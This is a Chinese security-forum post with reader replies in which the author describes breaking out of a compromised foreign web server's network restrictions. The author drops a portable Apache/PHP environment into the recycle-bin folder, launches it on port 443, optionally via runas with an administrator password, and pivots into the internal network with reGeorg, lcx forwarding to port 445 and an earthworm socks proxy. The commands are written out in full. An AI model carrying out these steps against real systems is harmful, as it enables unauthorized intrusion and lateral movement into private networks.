用户
搜索
  • TA的每日心情
    郁闷
    2018-3-22 15:43
  • 签到天数: 58 天

    连续签到: 1 天

    [LV.5]常住居民I

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    19

    主题

    97

    帖子

    1816

    魔法币
    收听
    0
    粉丝
    50
    注册时间
    2015-11-20

    i春秋签约作者

    发表于 2018-1-27 12:03:35 377156

    前言

    前两天做一个国外项目,前期打点搞下一个web主机,但是由于网络限制严格,一直没能内网渗透。该机器网络情况描述如下:不连外网、仅仅支持asp脚本,aspx、ashx都不行。TCP只进不出,防火墙仅仅对外开放443,80端口。端口转发、earthworm等工具都出不来。测试了http_reverse和dns的木马,竟然也弹不出来,很是郁闷。

    那么,看到这里,不知您有什么方法突破限制进去呢。欢迎讨论!我的方法比较极端了。

    解决思路

    工具:7z.exe,apache,php,,regeorg

    我只能从web端考虑了,使用reduh和regeorg等工具,都没有asp版本。于是想到创造其他脚本环境,如php。

    我做了一个可以命令行启动的超简单的php环境,压缩到php-web.7z,不到10M。

    先上传php-web.7z、7z.exe到服务器。

    注意 ,这里的php-web.7z不可改文件名,涉及到web相对路径和根目录问题,必须解压到c:\recycler\php-web
    复制到回收站:

    copy C:\Inetpub\wwwroot\php-web.7z c:\recycler\php-web.7z
            1 file(s) copied.
    

    解压文件,使用7z神器:

    C:\RECYCLER\7z.exe x c:\recycler\php-web.7z -oc:\recycler\

    关于http端口,修改apache文件C:\RECYCLER\php-web\Apache\conf\httpd1.conf59行,我此处监听443端口,尽量用443,21,8080之类防火墙放过的端口(我此处仅仅可以使用):

    Listen 443

    直接启动apache:

    C:\RECYCLER\php-web\Apache\bin\httpd.exe

    如果你想让php权限大一些,使用runas,管理员权限运行httpd(理论上不用admin也可以):

    C:\Inetpubistrat\tmp\props\S_RA.txt administrator t00ls "C:\RECYCLER\php-web\Apache\bin\httpd.exe"

    然后访问http://target.com:443/phpinfo.php,so good。。。

    下面的http://target.com:443/我使用http://192.168.100.58代替演示:

    1516950814533.png

    下面的操作老司机都轻车熟路,不多说:

    1. 端口转发

    1516950741978.png

    连接内网主机:

    1516950877793.png

    2. 全局代理进入内网

    此处使用regoreg:

    1516974833163.png

    客户端:

    1516975043433.png

    1516975537672.png

    接下来的事情就不必多说了吧,内网搞起。

    其实有一点我后来疏忽了,443对外开放,端口就算不转出来,也可间接搞内网,只能单端口:

    lcx.exe -tran 443 192.168.8.199 445

    还有就是,如果目标机443没有占用且映射到那台内网机器,或者说目标机是独立ip机器,如果限制不严可以直接(使用ew创建目标机的socks5代理):

    ew_for_win.exe -s socks -l 443

    然后:

    proxifier proxy: socks5 targetip 443

    个人觉得还是http被拦截的几率小一点。表哥们还有其他思路或者好的工具,欢迎讨论,我用reduh和reGeorg不是很稳定。

    附件是命令行启动的超简单的php环境,一定要固定的路径,端口443,手工做的。

    还有其他思路或者好的工具,欢迎讨论,我用reduh和reGeorg不是很稳定。

    游客,如果您要查看本帖隐藏内容请回复



    Only the code will always follow me.
    突破防火墙和脚本限制建立代理隧道
    使用道具 举报 回复
    来学习学习大神的技术么么哒
    使用道具 举报 回复
    发表于 2018-2-2 10:55:39
    思路不错,我下载下来看看php
    使用道具 举报 回复
    666666666666666666666666
    使用道具 举报 回复
    发表于 2018-1-30 16:30:24
    给超简单的php环境一个赞
    举世皆醒我独醉,世情淡泊我如胶
    使用道具 举报 回复
    11111111111111111111111
    使用道具 举报 回复
    超级简单的php环境很赞。
    使用道具 举报 回复
    666,学习一波内网技巧
    使用道具 举报 回复
    发表于 2018-1-27 16:49:31
    可以可以
    使用道具 举报 回复
    发表于 2018-1-27 16:53:18
    感谢分享
    使用道具 举报 回复
    666666666666
    使用道具 举报 回复
    支持加油哦哦哦哦哦
    使用道具 举报 回复
    发表于 2018-1-27 18:41:02
    感谢分享!
    使用道具 举报 回复
    66666666666666
    使用道具 举报 回复
    发表于 2018-1-27 19:59:02
    可以可以
    使用道具 举报 回复
    路过看看
    使用道具 举报 回复
    感谢分享!
    使用道具 举报 回复
    发表于 2018-1-28 09:32:53
    厉害!学习
    使用道具 举报 回复
    发表于 2018-1-28 15:06:27
    学习新姿势,666666
    使用道具 举报 回复
    发表于 2018-1-29 09:12:39
    小白过来学姿势
    使用道具 举报 回复
    123下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册